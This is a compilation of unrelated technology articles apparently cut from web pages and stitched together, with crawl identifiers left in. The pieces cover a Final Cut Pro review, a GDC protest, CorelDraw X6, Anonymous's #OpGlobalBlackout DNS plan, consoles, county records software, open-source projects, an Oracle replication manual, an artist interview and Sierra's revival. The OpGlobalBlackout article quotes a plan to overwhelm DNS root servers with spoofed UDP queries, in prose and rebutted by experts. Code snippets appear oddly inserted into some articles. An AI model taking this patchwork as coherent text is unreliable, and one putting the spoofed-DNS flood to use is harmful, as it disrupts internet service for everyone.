And while Final Cut Pro—along with Compressor 4—excels at delivering video for distribution via the Web, the industry still relies on discs for delivery and sales. "Apple is fixated on downloads," Jordan told Ars. "However, the world of media is using DVDs and Blu-ray to make money. I am personally very disappointed that Apple did not continue DVD Studio Pro."
For users who still need to deliver projects on disc, they will have to use the existing version of DVD Studio Pro or consider Adobe Encore.
Most vexing for some pro users, however, is the lack of tape control for import and export. While Final Cut Pro X has some capacity to import from tape, there is no ability to control output to tape. Final Cut Pro X is largely built on the assumption that footage is captured digitally and output directly to some digital form. Editors that work in the broadcasting industry in particular, where tape is still regularly used, may not be able to work with these limitations. Again, the ability to install FCPX while still holding on to and using FCP7 will be advantageous here.
Putting aside the technical issues, though, Jordan offers editors one last bit of advice. "Don't lose sight of the fact that we are not in the software business," he said. "We are in the story-telling business."
Final Cut Pro X is available now via the Mac App Store for $299.99. Motion 5 and Compressor 4 are also available now for $49.99 each.
2015-48/3679/en_head.json.gz/4181 | “Protestors” call games industry a “temple of sin,” demand repentance
A pair of "protesters" outside the Game Developers Conference helped draw …
what they see as the sins of the video game indPhotograph by Kyle Orland
Between all the scheduled panels, meetings, and game demonstrations, covering a gathering like the Game Developers Conference can sometimes feel a bit too predictable. Thank God, then, for scenes like the one above, in which two "protesters" threw a bit of unpredictability into the proceedings by noisily decrying a focus on marketing and monetization that they say is holding the game industry back.
Johannes Grenzfurthner, the guy holding the "God Hates Game Designers" sign seen above, is no stranger to "autonomous actions" like the impromptu protest he held in front of San Francisco's Moscone Center this week. As the founder of international art group monochrom, he's helped organize "context hacking" happenings that have involved everything from building cocktail robots to sending scanned scrotum pictures to various politicians (no, it's not safe for work).
Fellow protestor Adam Flynn said he's worked on noncommercial games in the past and follows the industry closely. He wanted to take advantage of the conference "opportunistically" to promote the idea that gamers should be seen as the audience for artistic works, rather than as monetizable customers to exploit.
"When you start to treat someone like a bundle of revenue rather than as a humane and natural and vital end unto themselves, it leads to a sort of cheapening of human relations," Flynn told Ars Technica. While commerce has always been a part of video games, Flynn says the free-to-play model is especially harmful to the idea of games as meaningful experiences.
"At least when there was an initial transaction, the relationship afterwards was to provide fun," he said. "Now, the notion of games as a service leads to an ongoing sales pitch. Anyone who's ever dealt with a door-to-door salesman has realized that relating with that person in a deep or human manner is relatively hard to come by, and there is a certain feeling of the relations with the other person being reduced to a mechanistic sense."
Flynn was unsympathetic to the suggestion that providing games as an ongoing service means that developers need to make sure the player continues to have fun well after the initial purchase.
"If you reduce fun to a set of mechanisms reminiscent of a rat in a cage hitting a lever to get a pellet, I think that reduces something rich and vital about the human experience," he said. Now is the time to discuss these issues, he added, as the first few decades of a medium's development can affect the way it progresses well into the future.
Bemused GDC attendees stop to take pictures of the protestors, who insulted the attendees' chosen profession continuously throughout. Photograph by Kyle Orland
Grenzfurthner insisted that the pair's protest wasn't subtle viral marketing for some product or another—an important point to clarify on a street corner where paid spokespeople were handing out samples for everything from Magicka to Nos energy drink. Not that loud cries calling the conference a "temple of sin" and demanding that attendees kneel on the ground seeking repentance could be easily mistaken for a marketing message in the first place.
"Look at all those sad faces, coming from your sad game challenges," Grenzfurther cried to a bemused crowd that stopped to take pictures. "There is time to turn around. There is time to stop that way of living. ... You don't want to be John Romero! Take your badges and throw them on the ground!" | 计算机 |
2015-48/3679/en_head.json.gz/4695 | CorelDraw Turns Sixteen
By Harry McCracken (@harrymccracken) | March 20, 2012
Corel’s flagship software product, CorelDraw, has been around since 1989, making it among the most venerable packages in the business. I’ve been using it nearly that long (since version 2 or 3, I think). Today, the company released CorelDraw X6 — and since the “X” stands for “10,” that means this is the 16th major release of the vector-drawing software for Windows.
When software’s that mature, it’s hard to radically improve it in ways that actually do improve it. And I don’t think Corel really wants to impose sweeping change at this point. Its software has plenty of loyal users, and it wants to keep them loyal by letting them work in a more modern, efficent version of they software they already know.
CorelDraw’s user interface is mostly the same as it’s been for years, and much of what’s new involves technical updates: CorelDraw is now now a 64-bit app that supports multicore processors for better multitasking. It also supports OpenType fonts for more sophisticated typography, and handles Adobe’s CS5 file formats.
There are a bunch of new features, mostly designed with speed and precision in mind — better alignment guides, for instance, and the ability to create different templates for each page of a multi-page document. (Unlike its perennial rival, Adobe Illustrator, CorelDraw has long done desktop publishing as a sideline along with single-page drawing.) Several new vector-drawing tools, including smear, twirl, attract and repel, let you nudge around the points in an object to quickly distort them.
Photo-Paint, the image editor that comes with CorelDraw, was once a serious alternative to Photoshop; it hasn’t evolved much in many years, though, and these days it feels more like a minor bonus than a major reason to pick up the package. But I do like Smart Carver, a new feature which lets you change a photo’s aspect ratio by painting out parts of it and then letting Photo-Paint squish the image without leaving visible seams.
I could go on — the list of additions is lengthy even if none of them are huge — but using X6, I realize that I'm probably a relatively undemanding CorelDraw user. I like the same things I've always liked, including the straightforward interface, the Swiss Army Knife-like versatility, the well-done help and examples, the bevy of bundled content (including 1000 OpenType fonts). For everything that's changed about how I use computers in recent years, here's one thing that hasn't: When I'm doing graphics on a Windows computer, I use CorelDraw.
The new version is $499 for the full version and $199 as an upgrade; it's available as a download now and will arrive in boxed form later this month.
If #OpGlobalBlackout is a ploy to blackout the entire Internet, could it work?
by Brad McCarty
16 Feb '12, 10:47pm in Insider
http://tnw.to/1DMvW
The idea is seemingly simple: There are 13 servers that control the domain name services around the world. If you manage to take out all 13 of them, you effectively blackout the Internet. That’s what OpGlobalBlackout, an initiative from Anonymous, would like to attempt. But just how realistic is the threat? I was curious, so it was time to ask the experts.
First off, it’s worth noting that #OpGlobalBlackout is initially attributed to an idea to take down Sony’s PlayStation Network, Facebook, the UN and others in response to the closing of Megaupload. But then it evolved. What’s not known is whether the evolution is an elaborate troll, or a real idea. But let’s assume, for the sake of argument and investigation, that the threat is real.
Let’s go back in time a few days, to a message posted on PasteBin. It explained, in detail, the method by which Anonymous (or at least one member who wrote the message) wished to implement, and the effect it would have:
“The principle is simple; a flaw that uses forged UDP packets is to be used to trigger a rush of DNS queries all redirected and reflected to those 13 IPs. The flaw is as follow; since the UDP protocol allows it, we can change the source IP of the sender to our target, thus spoofing the source of the DNS query.”
But something about the plans just didn’t seem solid to me. It seemed, for lack of a better word, too simple. We all know that there can be drastic consequences brought on by simple measures in many instances, but we’re talking about a system that is attacked regularly, and massively. It really couldn’t be this easy, could it?
For that answer, I turned to some experts. I first sent an email over to Matthew Prince of CloudFlare. Even if he wasn’t the right guy, he’d know the right guy. And indeed he did. One of CloudFlare’s employees, David Conrad, formerly served as ICANN’s VP of IT and Research. In one notable moment of his career, he oversaw the signing of the DNS root. That is to say, he’d be a guy with the answers.
A Series of Tubes?
The first point that Conrad brings up to me is this map:
This is a representation of the 13 servers, and all of their various instances, spread around the globe. That is to say that, for every one of the IP address, there are potentially hundreds of different servers that send traffic back to it. This immediately ups the difficulty of what Anonymous is trying to do.
The next point that Conrad makes is that the servers are almost always under attack, but the system has been built and modified to be resistant to these problems. As an example, he points to a graph from a single root server operator showing a spike up to nearly 40,000 queries per second, then another attack shortly after. But nobody was the wiser because of the redundancy of the system.
The particular root server in question here, according to Conrad, has roughly 100 machines distributed around the globe. Each of these machines can handle around 100,000 queries per second. That spike to 40,000 amounts to little more than a drop in the bucket, and Conrad reiterates the fact that it’s not the largest root server operation.
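To put those figures in perspective, here's a quick back-of-the-envelope check — a sketch using only the numbers quoted above, not measured values, since real fleet sizes and per-machine limits vary by operator:

```python
# Rough capacity math for a single root server operator, using the figures
# Conrad quotes above (illustrative only).
machines_per_operator = 100      # "roughly 100 machines distributed around the globe"
queries_per_machine = 100_000    # each "can handle around 100,000 queries per second"
attack_spike = 40_000            # the spike shown in the operator's graph

operator_capacity = machines_per_operator * queries_per_machine
print(f"aggregate capacity: {operator_capacity:,} qps")                       # 10,000,000
print(f"spike as share of capacity: {attack_spike / operator_capacity:.2%}")  # 0.40%
```

Even if that spike landed on a single operator in full, it would consume well under one percent of the operator's theoretical headroom — and as noted, this is not even the largest root server operation.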
Conrad relates a story from earlier days of the Internet, when during a denial of service (DoS) attack, “3 or 4 of the root server IP addresses” for some people were taken offline. During this time, however, “I don’t believe anyone other than the folks who monitor root servers noticed.”
But there are other factors at work here too, and they’re a bit more human. Even if the attack were overall unsuccessful in bringing down the whole of the Internet, something of the scale that Anonymous is planning would almost certainly impact a non-trivial portion of traffic. In doing that, you’re angering the people that you’re not necessarily trying to affect.
The Human Condition
Dave [yes, the name is fake, until I get permission otherwise] is another person to whom I was referred to for this story. He holds a different position of the same job that Conrad once held. The insight that he gives is more related to the people, rather than the hardware.
It’s worth understanding that each of the server IPs is then decentralized so that it can accept traffic from different places. As Dave tells me, people need to understand the bottleneck that can happen.
For instance, let’s say that (theoretically) each of the servers could handle 40,000 incoming traffic requests. If, suddenly, 100,000 requests were being sent to a server, 60,000 of those are simply dying due to timeouts, thus they’re not effective in the grand scale. There is a bottleneck to that upstream server, and it can not handle the amount of traffic that the server itself can.
“We’ve always explored this, in theory. We’ve put things in place, such as Anycast [a system of addressing in which requests are sent to the topologically nearest node of a group of recievers].”
But it’s not a single Anycast setup. It is, in fact, more along the lines of 50 and, “we’d like to have 100”. Now, multiply that by the 12 other root nameservers, and the multiples of each of those. You’ll start to see why it would take an inordinately huge, organized attack to even make a dent in the system.
But therein lies the exact problem. There’s only so much that can be accounted for, and there’s no way to get to the “leader” of Anonymous to stop an attack. So how much firepower does the group have, and is it able to muster itself in order to effectively accomplish its goal?
The other massive hurdle here is that Anonymous is (largely) using the Internet in order to organize its actions. If an attack on this scale were to be successful, the group then loses its best source of that organization. It’s a bit like the old cartoons where the guy is up in the tree, cutting off a limb, while sitting on the end that will fall.
As is common with any viable threat to the Internet at large, due diligence has to be paid. No system is completely removed from the threat of a massive denial of service attack, but our DNS has been built with that very realization in mind. It’s with that knowledge that precautions have been taken, redundancy has been put in place, and Anonymous’ mission would be incredibly hard to accomplish.
What’s your take? Does Anon have the Internet muscle to take down the whole of the Internet? Even if it could, should it happen? Or is it all just a brilliant disguise for an otherwise-dead mission? Tweet 38 Share 0 Share 0 Email Brad McCarty
The Console Isn't Dead - It's Evolving
by Robert Levitan on 04/10/12 02:09:00 pm
At this year’s GDC, as usual, most of the talk was about mobile and PC platform games. The most common questions I heard: “What are you doing on mobile?” “How are you doing your PC distribution?” and “When is your PC game going mobile?” Dedicated gaming consoles, on the other hand, seem to be the platform everybody is quickly forgetting about. Some have even gone so far as to prepare for their inevitable “death.”
Perhaps that’s an overgeneralization. What seems to be actually happening right now is that the lines between PCs, consoles, and mobile devices are blurring, with more functions appearing on every device that had once been the sole domain of a single platform. Mobile devices, particularly tablets, now have amazing graphical capabilities. Ever-growing broadband availability and increasingly powerful laptops are enabling the PC to be a more compelling and more portable gaming device. The content available online for console users is widening every day, and motion controls and touch interfaces have arrived in the form of Kinect, Move, the Vita, and the Wii U.
Is it a fair fight? It's not that consoles are underpowered or underappreciated – nobody expects the current lineup of gaming hardware, now going on seven years old (with the Xbox 360 released in late 2005), to be a match for recently developed technology. It's that the consoles' main draw is getting lost in a sea of other devices that provide high-quality gaming experiences and other core functions. Why would consumers pick consoles when they deliver neither the inherent connectivity nor the portability of a mobile device, nor the versatility, variety of design, and cutting-edge processing power of a personal computer? Right now, these competing platforms can do just about everything a console can do, plus a few things they can't.
In order to stay relevant, dedicated game platforms need to recapture and emphasize the things that they can do that users can’t get from anywhere else. The core of the console’s identity, in many gamers’ minds, is the ability to provide the “hardcore” experience. The triple-A blockbuster games – the next Uncharted or Gears of War or Final Fantasy – are always going to appear on a platform that lets studios show off their advances in graphics, animation, music, and so forth. Those kinds of theatrics are best seen on (what else?) a home theater. Simply by attaching itself to the latest in HD displays, surround sound systems, and utilizing a control system that can be easily used from the couch, the home console is still the best platform for such games.
Speaking of home theaters, the consoles also need to double down on their other entertainment content, namely TV and movie content. Most of this is already in place: console owners can get streaming content from Netflix, Hulu Plus, and other providers via any current console. While these services may also be available on tablets and PCs, consumers prefer to consume their TV on a TV. Right now, the console is the device of choice for this content, but those consoles need to make sure they offer the simplest and most satisfying way to do so, perhaps through better interfaces like Kinect or voice control. Unless, of course, they’re prepared to lose customers to the emerging market of app-enabled Smart TVs.
The next generation of consoles needs to offer just as many options for the acquisition and use of content: expanded digital distribution, for starters. I would go so far as to say it may be time to ditch the disc entirely in favor of purely downloadable offerings, which would also give the publishers (and gamers) the control they’ve been hoping for. Always-on connectivity, a robust digital catalog, and enough expanded storage to make use of them: these are the bare essentials for the next consoles to stay relevant.
This is hardly an impossible task. Sony and Microsoft have already started down this path, but they need to move faster (if possible) or else someone’s going to beat them to the punch: A few weeks ago, rumors circulated about Valve getting into the gaming hardware business, and while the company officially denied those plans (for now!), that possibility was extremely easy for all of us to believe. If Steam could bring its massive catalog and userbase to bear in a couch-and-controller setting, they could turn into a force to rival Microsoft, Sony, and Nintendo.
The console itself is not dead but perhaps the traditional concept of the console is breathing its last breath. As standalone gaming devices, consoles are being swallowed up by increasingly powerful and more versatile devices. The console must be reinvented as a replacement for the “set-top box,” acting as the primary conduit for people to consume all kinds of digital entertainment – games, television, movies, music, and social media.
Rapid changes in technology threaten all media ecosystems. Similar to other media platforms, consoles have a simple choice: evolve or die.
Houston County moving forward with looking into upgrades of records management software
Published July 1, 2014 at 9:18 am By Daniel E. McGonigle
The Caledonia Argus
On Monday, June 23 at the regular meeting of the Caledonia city council, the council voted to approve an upgrade of their computer systems and software contingent upon the county board doing the same.
On Tuesday, June 24, Scott Yeiter came before the county commissioners to make a similar request.
The board heard a power point presentation from Yeiter regarding the communication software and hardware upgrades.
“I’m not asking for full approval right now,” noted Yeiter. “What I would like to do is enter into negotiations with LETG.” (the company who would provide the software and technical training needed for the upgrade).
Yeiter noted that the current system is 30 years old. In many cases, he said, the dispatch office doesn’t even know where his officers are located.
“So if they go in the ditch somewhere off a county road, we wouldn’t even be able to find them,” he said.
The system the county is proposing to upgrade is one that Mower, Fillmore and Winona counties just went online with.
LETG is a Minnesota based company and employs former cops who aren’t just computer programers, but know what they’d like to see out of the service.
Another feature of interest is that the system can communicate across law enforcement agencies and different components of the legal process.
“So from 9-1-1 call to conviction this system can communicate throughout the process,” said Yeiter.
The system is expected to cost the county $190,748 with an annual service contract of $28,398. Cities within Houston County would be able to log onto the server, which would be located at the courthouse, and access information across departments.
The individual cities would also incur some costs depending on their sizes.
Caledonia estimated that to fit their vehicles it would be about $27,000 or $9,000 per squad car.
In the power-point that Yeiter presented, Caledonia’s cost read $16,559 for installation and $2,765 per year for service and maintenance.
The county board authorized Yeiter to move forward and work through the bidding process.
He expected the next 30-60 days would be spent working with representatives from LETG on securing funding and coming to an agreement on a price.
The reason Yeiter wanted the vote to occur yet this June: Winona County had put Houston County on its Request for Proposal, which saved the county time and money. However, that RFP was only good until the end of June.
The 10 Best Open Source Projects You Should Be Volunteering To Help With
The success of Open Source projects has defied the old saying – too many cooks spoil the broth. If you doubt the success of the open source initiative, you just have to look at Firefox and WordPress, probably two tools that are helping you to read most of the web. Then, you probably are fixing up a date on an Android phone.
My colleague Erez explained Why You Should Contribute To Open Source Projects [Opinion]. You aren’t a coder? Read 8 Ways To Help Open-Source Projects If You’re Not A Coder. You could be a writer, a designer, a translator, just a Facebook or Twitter junkie, or someone who wants to just donate money for the cause. There are different levels where you can put your two bits. And here are ten of the many open source projects where you can.
Mozilla Developer Network
This is where Firefox, Thunderbird, and other Mozilla projects were born. The Mozilla Foundation’s wiki has all the documentation and tools you will need for the Mozilla platform. About:mozilla is a weekly round-up of news and contribution opportunities. You can also watch out for the News & Update section on the wiki homepage where application development information is posted regularly.
The community support forum is also a place where you can contribute your knowhow by troubleshooting problems. Mozilla Forum has subject specific mailing lists and newsgroups. Hiring and work related information can be found here. Mozilla also has The Mozilla Reps program for volunteers. While you are on the Mozilla site, don’t forget to check out the well-designed Learning section for links to HTML, CSS, and JavaScript tutorials.
The Chromium Projects
Chromium and Chromium OS are the open-source projects that develop the Google Chrome browser and Google Chrome OS. The Chromium Projects site hosts the documentation and code related to the Chromium projects and is the single point of reference for developers interested in learning about and contributing to the open-source projects.
Both project sites are neatly organized and you can follow the links which tell how you can volunteer and join the development (for instance, the beta and dev channels). You can also submit patches or do something as plain as join a discussion group. Check out the slideshow which shows you the life of a Chromium developer.
The Apache Software Foundation
The Apache web server project isn’t the only one for this open source community. You can start with the catalog of projects that are in development or in the pipeline and pick one to volunteer for. The open projects are lined up in categories. Developers and users join mailing lists, download releases, report on bugs and errors, and contribute patches. Dive into the Get Involved page to read more. More than any other open source community, the Apache Foundation seeks consistent commitment and membership is granted only to volunteers who have actively contributed to Apache projects over the course.
Drupal
Drupal is a leading CMS (Content Management System) and is widely used for web authoring. Free and open source, recognizable names like NASA, The White House, Ubuntu, Zynga etc. use Drupal. Drupal has nearly 16000+ themes and 1300+ modules for building rich websites. As a volunteer you can contribute to this development and many more like working on translations and documentation. Hit the Getting Involved page for more details.
GNOME
GNOME is a desktop environment that works with most Linux distributions. The GNOME project is an international community that is always actively calling for volunteers. If you are a writer, you can also find a place in the GNOME development community for working on developer guides and other content. Each individual role is clearly laid out with guidelines. Coders can head straight to the GnomeLove page which is basically a getting started guide.
Ubuntu
Ubuntu is a Linux distribution and behind it a large community of interested developers. The ContributeToUbuntu page introduces you to the kinds of work you can contribute to the operating system. When you think that Ubuntu usually has a six-month development cycle, there's always work available. Ubuntu, quite uniquely has an Ubuntu Women section. This section encourages women to get involved in the use and development of Ubuntu.
Moodle
The Modular Object-Oriented Dynamic Learning Environment (Moodle) is a popular open source learning platform. The platform gives you powerful tools to develop full-fledged learning courses online. The Learning Management System is constructed with PHP. As the site says – We welcome PHP programmers of course, but you can also contribute through discussions, testing, feedback and documentation. You can contribute to the development of the core platforms or the various modules and plugins.
Joomla
Joomla, like Drupal, is a content management system for developing full-blown websites. Joomla is built using PHP and MySQL. It is the second most popular CMS after WordPress. From little homepages to e-commerce sites, Joomla sees many applications. In fact, Linux.com is a Joomla site. Joomla has 200,000 community users and contributors. On Joomla, anyone can contribute on any level, even newcomers. You can join any of the Joomla working groups and help the platform reach its open source goals.
Python
Python is an open source programming language (basically a scripting language) and it runs on Windows, Linux/Unix, Mac OS X and can be ported to the Java and .NET virtual machines too. From Wikipedia – Among the users of Python are YouTube, and the original BitTorrent client. Large organizations that make use of Python include Google, Yahoo, CERN, and NASA. The Python Software Foundation pushes the development of the language. The Python Developer's Guide and The Python Mentors Group are the two go-to sources if you want to volunteer here. Also read the Developer FAQ.
Speed Dreams
An open source game had to be on the list. And though there are many, I have chosen this. The open source and free car racing simulation game is released under the GNU General Public License (GPL). It is derived from the open racing car simulator Torcs. As an end-user you can suggest improvements and as developer you can send in your codes and patched for testing. See the Get Involved page for more details.
Other games you can contribute to are Xonotic, 0 A.D, and VegaStrike among many others.
Well, that’s definitely not all as the open source world is a vast one. Here is a list of open source project repositories where you can find work on many small and big open source projects looking for help:
Google Code
Gamedev
OpenHatch
Also, look into our posts on what’s open source. You can find a few more projects that are looking for help too. In the meantime, we would like a feedback from you – have you worked in an open source project? What was the experience like? What advice would you give to beginners who are looking to take the volunteer path?
Write a Comment
anonymous
Try to help out with an issue with Gnome and they were downright nasty about it. I’ve written code and sent patches to several projects before and since. How about listing projects that actually want volunteers instead of just projects that claim they want volunteers.
Saikat
Your feedback is important but I wouldn’t be in a hurry to jump to a conclusion that the whole community behind the project is bad. You know, as in the real world, our perceptions often get colored when we meet one negative character across the counter!
If you looking for more informations about social networking scripts, heres some:
http://www.squidoo.com/create-your-own-social-network-3-best-social-network-engines
azmath
Please volunteer to write Khan Academy inspired textbooks at http://www.katextbook.org/guidelines This is an opensource project to create world class educational textbooks freely available to students across the world. Please volunteer.
Saikat Basu
Thanks for this really useful link. Didn’t know that there was such a project out there. Just imagine the help this could be for students in countries which do not have access to good study material.
Dear Basu, Thanks a lot for your appreciation. We are desperately looking out for volunteers, would you mind spreading the word through your blog?
jay13213
open source should be the only way allowed some more info on
Im after open source projects and idea 100%, open source programing should be the only allowed way to publish online
some other scripts some of them open source
Results 11 - 20 of 413
Internet Voting: Issues and Legislation
Creator: Coleman, Kevin J & Nunno, Richard M
Manipulating Molecules: The National Nanotechnology Initiative
Creator: Davey, Michael E
Manipulating Molecules: Federal Support for Nanotechnology Research
Creator: Davey, Michael E.
Description: The Bush Administration has requested $1.277 billion for nanotechnology research for FY2007. Nanotechnology is a newly emerging field of science where scientists and engineers are beginning to manipulate matter at the molecular and atomic levels in order to obtain materials and systems with significantly improved properties. Scientists note that nanotechnology is still in its infancy, with large scale practical applications 10 to 30 year away. Congressional concerns include funding for the National Nanotechnology Initiative (NNI), the potential environmental and health concerns associated with the development and deployment of nanotechnology, and the need to adopt international measurement standards for nanotechnology.
Cybercrime: An Overview of the Federal Computer Fraud and Abuse Statute and Related Federal Criminal Laws
Creator: Doyle, Charles & Weir, Alyssa Bartlett
Description: The federal computer fraud and abuse statute, 18 U.S.C. 1030, protects federal computers, bank computers, and computers used in interstate and foreign commerce. It shields them from trespassing, threats, damage, espionage, and from being corruptly used as instruments of fraud. It is not a comprehensive provision, but instead it fills crack and gaps in the protection afforded by other federal criminal laws. This is a brief sketch of section 1030 and some of its federal statutory companions.
Lasers Aimed at Aircraft Cockpits: Background and Possible Options to Address the Threat to Aviation Safety and Security
Creator: Elias, Bartholomew
Electronic Payments and the U.S. Payments System
Creator: Eubanks, Walter W & Smale, Pauline
Description: This report provides a framework for understanding the paper-based and electronic components of the current U.S. payments system. It begins with a basic overview of the payments system, explaining the relative size and growth of various methods of payment. The report discusses paper-based payments and then examines the operations of wholesale and retail electronic payments. Finally, the report discusses some of the major policy issues concerning the regulation and supervision of electronic payments.
Legal Issues Related to Prescription Drug Sales on the Internet
Creator: Feder, Jody
1 Introduction to Advanced Replication
This chapter explains the basic concepts and terminology related to Advanced Replication.
Overview of Replication
Applications that Use Replication
Replication Objects, Groups, and Sites
Types of Replication Environments
Administration Tools for a Replication Environment
Replication Conflicts
Other Options for Multimaster Replication
If you are using Trusted Oracle, then see your documentation for Oracle security-related products for information about using replication in that environment.
Replication is the process of copying and maintaining database objects, such as tables, in multiple databases that make up a distributed database system. Changes applied at one site are captured and stored locally before being forwarded and applied at each of the remote locations. Advanced Replication is a fully integrated feature of the Oracle server; it is not a separate server.
Replication uses distributed database technology to share data between multiple sites, but a replicated database and a distributed database are not the same. In a distributed database, data is available at many locations, but a particular table resides at only one location. For example, the employees table resides at only the ny.example.com database in a distributed database system that also includes the hk.example.com and la.example.com databases. Replication means that the same data is available at multiple locations. For example, the employees table is available at ny.example.com, hk.example.com, and la.example.com.
Some of the most common reasons for using replication are described as follows:
Availability
Replication provides fast, local access to shared data because it balances activity over multiple sites. Some users can access one server while other users access different servers, thereby reducing the load at all servers. Also, users can access data from the replication site that has the lowest access cost, which is typically the site that is geographically closest to them.
Performance
Replication provides fast, local access to shared data because it balances activity over multiple sites. Some users can access one server while other users access different servers, thereby reducing the load at all servers.
Disconnected Computing
A materialized view is a complete or partial copy (replica) of a target table from a single point in time. Materialized views enable users to work on a subset of a database while disconnected from the central database server. Later, when a connection is established, users can synchronize (refresh) materialized views on demand. When users refresh materialized views, they update the central database with all of their changes, and they receive any changes that happened while they were disconnected.
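As a concrete illustration, here is a minimal sketch of that create-then-refresh cycle, driven from Python with the cx_Oracle driver. The table and view names, database link, and credentials are hypothetical, a fast-refreshable view also requires a materialized view log on the master table, and this is not code from the Oracle documentation:

```python
import cx_Oracle

conn = cx_Oracle.connect("app_user", "app_password", "la.example.com/orcl")
cur = conn.cursor()

# Create a local, refresh-on-demand replica of a remote master table
# (assumes a database link to ny.example.com and a materialized view log
# on the master so that fast refresh is possible).
cur.execute("""
    CREATE MATERIALIZED VIEW orders_mv
    REFRESH FAST ON DEMAND
    AS SELECT * FROM orders@ny.example.com
""")

# Later, once the disconnected site is back online, synchronize it:
cur.callproc("DBMS_MVIEW.REFRESH", ["ORDERS_MV", "f"])  # "f" = fast refresh
conn.commit()
```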
Network Load Reduction and Mass Deployment
Replication can be used to distribute data over multiple regional locations. Then, applications can access various regional servers instead of accessing one central server. This configuration can reduce network load dramatically.
You can find more detailed descriptions of the uses of replication in later chapters.
The Advanced Replication feature is automatically installed and upgraded in every Oracle Database installation.
See Also: Oracle Database Administrator's Guide for more information about distributed databases
Applications that Use Replication
Replication supports a variety of applications that often have different requirements. Some applications allow for relatively autonomous individual materialized view sites. For example, sales force automation, field service, retail, and other mass deployment applications typically require data to be periodically synchronized between central database systems and a large number of small, remote sites, which are often disconnected from the central database. Members of a sales force must be able to complete transactions, regardless of whether they are connected to the central database. In this case, remote sites must be autonomous.
On the other hand, applications such as call centers and Internet systems require data on multiple servers to be synchronized in a continuous, nearly instantaneous manner to ensure that the service provided is available and equivalent at all times. For example, a retail Web site on the Internet must ensure that customers see the same information in the online catalog at each site. Here, data consistency is more important than site autonomy.
Advanced Replication can be used for each of the types of applications described in the previous paragraphs, and for systems that combine aspects of both types of applications. In fact, Advanced Replication can support both mass deployment and server-to-server replication, enabling integration into a single coherent environment. In such an environment, for example, sales force automation and customer service call centers can share data.
Advanced Replication can replicate data in environments that use different releases of Oracle and in environments that run Oracle on different operating systems. Therefore, applications that use data in such an environment can use Advanced Replication.
Replication Objects, Groups, and Sites
The following sections explain the basic components of a replication system, including replication objects, replication groups, and replication sites.
Replication Objects
A replication object is a database object existing on multiple servers in a distributed database system. In a replication environment, any updates made to a replication object at one site are applied to the copies at all other sites. Advanced Replication enables you to replicate the following types of objects:
Tables
Views and Object Views
Packages and Package Bodies
Procedures and Functions
User-Defined Types and Type Bodies
Indextypes
User-Defined Operators
Regarding tables, replication supports advanced features such as partitioned tables, index-organized tables, tables containing columns that are based on user-defined types, and object tables.
Replication Groups
Interview with Gregory Fromenteau
By Antonio Neto
Web: http://netocg.blogspot.com
Date Added: 29th November 2011 What does it feel like when you see your environment work in big brand games that people love?
Well I'm proud of the game and that people love it, but Ikeep in mind all the things we didn't have the time to do, and how to do better on the next one. You know artists - never happy with what they have!
Have you had much interaction with fans of the games that you've contributed to? And what are their reactions like when they find out what you do?
Some of my friends are fans of the game; it's always good to have a fresh eye on our work, especially if they are not in the industry. Their comments are really different, it's very interesting to listen to their points of views and their ideas for the next game.. .and sometimes we put those suggestions in the next one when we can do it!
What kinds of art and artists inspire you?
There's a lot! In concept art I think it's still Craig Mullins; for me he's the father of concept art in the industry. His pictures are extremely strong and efficient. After that I've found a lot of inspiration in the old paintings of Caravaggio, Piranesi etc. John Howe is also one of my favorite classic illustrators.
Where do your ideas and references come from?
They come from books, comics, movies, photos, documentaries - anything that contains pictures. I'm very curious by nature and interested in a lot of subjects. I guess it helps me to have diverse sources of inspiration.
For someone who is just starting their studies, what kind of mix of technical and artistic foundations do you think it's important to have?
I think that in the video game industry both technical and artistic skills are very important and required, because they are very much related to each other. You have to understand how something works technically to get the better result and have the best support from your technical direction.
What advice would you give someone who wants to work in 2D/3D environments? Observe, observe, observe and observe! Movies, photos, comics, travels - anything, really. Be curious. Even if you're not interested by a subject, check it out and you could be surprised. Don't confine your imagination. And if you are more 2D-oriented, draw whenever you have the opportunity. It's like learning a music instrument; the more you practice, the better you will become.
In your opinion, what makes a winning demo reel? For me it's the selection of the work. I prefer to have a portfolio with five kick-ass pictures over fifty average ones. Take the time to select your works, ask your friends and professors for advice, and keep the best in your portfolio. The quality is better than the quantity.
To round things off, what advice and tips would you offer people who are just starting out?
Focus on what you want to do and what you do the best. There are a lot of people on the market and you have to be one of the best to stand out. Don't try to do everything; it's good to know how things works, but if you have a specialty, try to be the best at it and stick to it! And when it's hard, don't forget why you are doing this work. It's because you love it!
About the interviewer:
Antonio Neto is a student from Gnomon School of Visual Effects, who is studying to be a 3D environment artist. He is focused on looking for a way he can replicate the real world inside a computer and create beautiful environments that have the capacity to convince people they're real. When he was young, his dream was to work for Squaresoft on one of the Final Fantasy projects, but now he's aiming for game cinematics - somewhere between feature films and games.
Emmax on Sun, 04 December 2011 6:26pm: awesome dude.
Sierra is back! And bringing King's Quest with it?
Fans of old-school PC gaming, listen up: the Sierra label appears to be making a comeback. A teaser site has popped up at Sierra.com for the Activision-owned brand, with the promise of more news to be revealed at August 2014’s Gamescom. Code buried deep within a CSS script on the site contains ASCII characters that mention King’s Quest and Geometry Wars. You might not realize it, but 2007’s Wii/DS game Geometry Wars: Galaxies was published under the Sierra name.
Related: King’s Quest rights revert to Activision as Telltale Games moves to other projects
The buried code was first discovered by a commenter on the IGN news story that points to the teaser site. The code itself is found inside one of the CSS scripts on the page, which is accessible by viewing the page source (you can also click here to go there directly). This is what you see when you get there:
The Sierra brand landed in Activision’s vault following the 2008 merger between Vivendi Games and the mega-publisher. Sierra was first founded in 1979 by husband-and-wife creative leads, Ken and Roberta Williams. The company, which was known as On-Line Systems until a 1982 name change rebranded it as Sierra On-Line, was one of the early popular developers of PC games, specifically graphical adventure games.
Sierra On-Line carried on after the Vivendi merger, with another name change in 2002 establishing it as Sierra Entertainment. The bulk of the studio’s output came prior to the merger, with series’ like King’s Quest, Space Quest, Police Quest, Leisure Suit Larry, Hero’s Quest (renamed to Quest for Glory), Gabriel Knight, and others helping to establish Sierra as one of the early dominant forces in PC game development.
Related: Gods Will Be Watching brings us back to the glory days of dying repeatedly in King’s Quest III
There’s been very little activity for Sierra since the Activision/Vivendi merger, but Gamescom seems poised to change that. The annual consumer and trade show kicks off in Cologne, Germany on August 13 and runs through August 17, so we should hear more soon.
